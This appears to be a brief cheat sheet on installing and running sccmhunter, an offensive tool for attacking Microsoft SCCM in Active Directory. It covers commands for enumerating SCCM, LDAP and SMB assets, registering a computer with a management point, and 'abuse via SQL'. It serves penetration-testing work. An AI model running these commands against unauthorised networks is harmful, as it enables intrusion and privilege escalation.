sccmhunter.py

A rad tool for hunting SCCM!

Install

git clone https://github.com/garrettfoster13/sccmhunter.git
cd sccmhunter
virtualenv --python=python3 .
source bin/activate
pip3 install -r requirements.txt
python3 sccmhunter.py -h

Enumerate SCCM config, enumerate remote hosts SMB shares, signing status, and SQL service status

sccmhunter.py find -u lowpriv -p 'JingleAllTheWay!' -d schwarzenegger.com -dc-ip 10.0.5.5

Enumerate SMB shares

The instructions say this "profiles and enumerates SMB shares of discovered SCCM servers, where as the find command "Enumerates LDAP and SCCM assets." I believe it does an SMB-level dive into shares looking for PXEBoot variables files.

sccmhunter.py smb -u lowpriv -p pass -d domain.com -dc-ip 1.2.3.4

Enumerate user accounts associated with SCCM

python3 sccmhunter.py show -users

View all the enumeration info you have after doing the "find" command

sccmhunter.py show -all

Create/register a computer with HTTP management point

sccmhunter.py http -u lowpriv -p 'JingleAllTheWay!' -d schwarzenegger.com -dc-ip 10.0.5.5 -ldaps -auto

Do the same thing but with an existing computer account

sccmhunter.py http -u lowpriv -p 'JingleAllTheWay!' -cn 'GHOSTY$' -cp 'ComputerPasswordForGhosty' -d schwarzenegger.com -dc-ip 10.0.5.5 -ldaps -auto

Abuse via SQL

sccmhunter.py mssql -u lowpriv -p 'JingleAllTheWay!' -d schwarzenegger.com -dc-ip 10.0.5.5 -tu lowpriv -sc SITECODE

Last updated on 2026-03-22